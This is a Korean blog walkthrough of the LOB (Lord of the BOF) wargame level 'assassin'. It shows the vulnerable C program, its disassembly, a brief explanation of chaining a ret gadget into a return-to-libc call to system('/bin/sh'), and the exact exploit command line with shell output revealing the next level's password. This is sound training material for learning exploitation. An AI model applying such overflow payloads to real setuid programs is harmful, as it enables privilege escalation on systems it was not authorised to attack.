![[LOB] Level15: gaint → assassin](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99F60A395B719AD411)
assassin
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
memset(buffer, 0, 44);
}
Dump of assembler code for function main: 0x8048470 <main>: push %ebp 0x8048471 <main+1>: mov %ebp,%esp 0x8048473 <main+3>: sub %esp,40 0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1 0x804847a <main+10>: jg 0x8048493 <main+35> 0x804847c <main+12>: push 0x8048570 0x8048481 <main+17>: call 0x8048378 <printf> 0x8048486 <main+22>: add %esp,4 0x8048489 <main+25>: push 0 0x804848b <main+27>: call 0x8048388 <exit> 0x8048490 <main+32>: add %esp,4 0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12] 0x8048496 <main+38>: add %eax,4 0x8048499 <main+41>: mov %edx,DWORD PTR [%eax] 0x804849b <main+43>: add %edx,47 0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf 0x80484a1 <main+49>: jne 0x80484c0 <main+80> 0x80484a3 <main+51>: push 0x804857c 0x80484a8 <main+56>: call 0x8048378 <printf> 0x80484ad <main+61>: add %esp,4 0x80484b0 <main+64>: push 0 0x80484b2 <main+66>: call 0x8048388 <exit> 0x80484b7 <main+71>: add %esp,4 0x80484ba <main+74>: lea %esi,[%esi] 0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12] 0x80484c3 <main+83>: add %eax,4 0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax] 0x80484c8 <main+88>: add %edx,47 0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40 0x80484ce <main+94>: jne 0x80484e7 <main+119> 0x80484d0 <main+96>: push 0x8048591 0x80484d5 <main+101>: call 0x8048378 <printf> 0x80484da <main+106>: add %esp,4 0x80484dd <main+109>: push 0 0x80484df <main+111>: call 0x8048388 <exit> 0x80484e4 <main+116>: add %esp,4 0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12] 0x80484ea <main+122>: add %eax,4 0x80484ed <main+125>: mov %edx,DWORD PTR [%eax] 0x80484ef <main+127>: push %edx 0x80484f0 <main+128>: lea %eax,[%ebp-40] 0x80484f3 <main+131>: push %eax 0x80484f4 <main+132>: call 0x80483a8 <strcpy> 0x80484f9 <main+137>: add %esp,8 0x80484fc <main+140>: lea %eax,[%ebp-40] 0x80484ff <main+143>: push %eax 0x8048500 <main+144>: push 0x80485ae 0x8048505 <main+149>: call 0x8048378 <printf> 0x804850a <main+154>: add %esp,8 0x804850d <main+157>: push 44 0x804850f <main+159>: push 0 0x8048511 <main+161>: lea %eax,[%ebp-40] 0x8048514 <main+164>: push %eax 0x8048515 <main+165>: call 0x8048398 <memset> 0x804851a <main+170>: add %esp,12 0x804851d <main+173>: leave 0x804851e <main+174>: ret 0x804851f <main+175>: nop End of assembler dump.
ret 주소에 라이브러리 주소나, 스택의 주소를 넣을 수 없으므로, 코드영역의 주소를 넣어야 된다고 생각 했다.
그래서 ret주소에 코드영역에 ret 명령어 주소(0x804851e)를 넣어 주었다.
따라서 더블 ret 가 실행되고, system함수를 불러오고 인자에 ""/bin/sh"를 넣어주어 쉘을 획득하였다.
system = 0x40058ae0
/bin/sh = 0x400fbff9
[giant@localhost giant]$ ./assassin `python -c 'print "A"*44+"\x1e\x85\x04\x08"+"\xe0\x8a\x05\x40"*2+"\xf9\xbf\x0f\x40"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@�@�@ bash$ my-pass euid = 515 pushing me away bash$ id uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
assassin / pushing me away
잘못 된 개념을 서술하였거나, 잘못 풀이된 내용이 있으면 댓글 달아주시면 감사합니다 :) 태클 댓글이나 메일(513.eunice@gmail.com) 환영입니다 !! 😊☺️👍 |